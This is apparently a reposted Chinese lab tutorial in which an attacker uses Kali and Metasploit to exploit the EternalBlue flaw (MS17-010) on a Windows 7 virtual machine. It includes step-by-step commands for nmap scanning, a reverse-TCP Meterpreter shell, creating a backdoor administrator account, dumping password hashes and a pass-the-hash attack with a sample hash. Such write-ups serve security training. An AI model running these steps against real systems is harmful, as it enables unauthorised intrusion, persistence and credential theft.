通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

这篇具有很好参考价值的文章主要介绍了通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境说明

机器

ip地址

Kali主机

192.168.231.129

win7靶机

192.168.231.143

一、获取目标主机的管理员权限

1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查看,可以看到两台机器在同一个网段内,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档
kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

即网段都在192.168.231中

2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24进行网段扫描,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到140和143的主机是存活的(因为这里我还开了一台靶机WindowsXP,该实验同样可以在WindowsXP中实现,实验步骤一样),还有一点发现就是在网段扫描中不会出现129的出现,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

因为129是Kali攻击机的ip地址,所以不会显示;

3.然后扫描目标主机的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(这里包括以后都以win7为例,winXP是同样的操作),

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到这里有一个ms17-010的漏洞,即我们熟知永恒之蓝漏洞,我们就可以利用这个漏洞来获得靶机的shell,

4.使用命令:msfconsole,进入metasploit工具,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

然后使用search命令,搜索永恒之蓝有什么可以利用的部分,search ms17-010,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到有0-4五个可以利用的漏洞,这里我们使用0栈溢出漏洞,使用use 0即可,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

5.然后它提示我们没有设置载荷,可以使用set命令来设置载荷,如:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

6.然后查看攻击模块所需要配置的参数:show options,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

7.在这里我们需要配置lhost,rhost,target,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

为了确保参数都配置好了,我们还是查看一下,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到该配置的参数都配置好了,然后就可以进行攻击了,

8.使用run命令,进行渗透攻击,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到我们已经成功渗透进入了win7,并获取了管理员权限,

9.然后进入win7目标机命令窗口,shell,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到出现了乱码,然后我们可以进行调整回正确的显示,输入:chcp 65001即可,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

然后我们就可以进行后渗透操作。

二、创建管理员账户

1.首先我们在win7的 控制面板->用户账户和家庭安全->用户账户->管理账户中可以查看现在已有的账户,然后我们进入shell并在目标机创建新的管理员用户,使用命令net user hacker hacker123 /add

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档
kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

2.但在这里我们可以看到,新建的用户hacker并不是一个管理员用户,所以还需要进行提权操作,使用命令,net localgroup Administrators hacker /add

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档
kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

然后我们可以看到hacker有之前的标准用户变成了管理员用户,

三、提取系统用户和密码hash值

提取系统用户名和密码Hash,使用命令,run post/windows/gather/hashdump

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

可以看到这里有刚刚创建的管理员用户hacker的用户名和hash密码,

四、hash重放攻击

1.所谓重放密码hash攻击,就是不再利用该漏洞,直接通过账户名和密码hash值进行攻击账户,从而达到获取管理员权限的目的。所以我们得退出现有的环境,不用该漏洞,直接exit,然后再重新进去msf,使用msfconsole,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

2.接着使用命令:use windows/smb/psexec;并进行payload的设置,set PAYLOAD windows/meterpreter/reverse_tcp;然后设置主机和靶机的ip,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

3.在设置账户和密码hash之前要先将win7下的UAC关闭,并将win7重启,不然会失败,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

4.设置账户,set SMBUser sherry即可,接着就是使用密码hash进行重放攻击了,直接使用之前获取的hash密码,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

在渗透之前再查看一遍参数是否全部设置成功,

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

5.在全部准备工作完成好之后,直接exploit即可,也可以使用run运行,文章来源地址https://www.toymoban.com/news/detail-718026.html

kali shell,网络安全,linux,安全,网络安全,Powered by 金山文档

到了这里,关于通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻

    2024年02月07日
    浏览(30)
  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(26)
  • 浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施

    一、永恒之蓝(Wannacry)漏洞简介 1)一种“蠕虫式”的勒索病毒软件,利用windows的SMB漏洞传播,可以获取System最高权限; 2)主要对windows服务器、主机有较大影响;黑客利用病毒对电脑重要文件进行加密,索要高比特币,是一种常见的 “勒索病毒” ; 3)中国部分Windows操作系统

    2024年02月13日
    浏览(23)
  • MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)                              2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作 :

    2024年02月08日
    浏览(37)
  • MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令“msfconsole ”,启动Metasploit;输入命令“use auxiliary/scanner/smb/smb_ms17_010”,加载扫描模块;输入命令“set RHOSTS 192.168.0.6”,设置需要被扫描的目标主机地址;输入命令“run”,进行扫描并观察是否存在该漏洞   输入命令“

    2024年02月05日
    浏览(38)
  • 通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录

    注意:本实验实在虚拟机中完成,旨在技术交流学习请勿用于任何违法犯罪的活动中;任何未经同意授权的渗透测试均为违法行为; 实验目的: 使用kali通过msfconsole工具,利用ms17-010漏洞获取靶机shell,创建账户远程登录到目标靶机上。 实验环境: 虚拟机环境下 攻击机:l

    2024年02月11日
    浏览(27)
  • Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

    一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 2.安装杀毒软件 3.禁用445端口 

    2023年04月16日
    浏览(38)
  • 永恒之蓝漏洞原理及漏洞复现

    摘要 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个

    2024年02月03日
    浏览(73)
  • MS17010(永恒之蓝)漏洞实战

    曾因苦难多壮志,不教红尘惑坚心。 使用搜索命令,搜索ms17_010 search ms17_010 搜索网段中主机漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例,show options 看一下配置 设置网段,run运行就行了 使用攻击模块 查看所需要的配置show options 开始配置payload、渗透地址、监听地址 开始攻击输入

    2024年02月07日
    浏览(27)
  • 漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞

    (1)一台Windows电脑 (可以使用虚拟机代替) 配置是 网络—右键,属性----高级共享设置----启用文件和打印机共享 (可以理解为,这样设置才使其具有了“永恒之蓝”漏洞) (2)Metasploit任意平台 可以是Windows版,可以是kali自带版 1.何为CVE-2017-0144? ​ CVE-2017-0144 既 永恒之蓝最

    2024年02月04日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包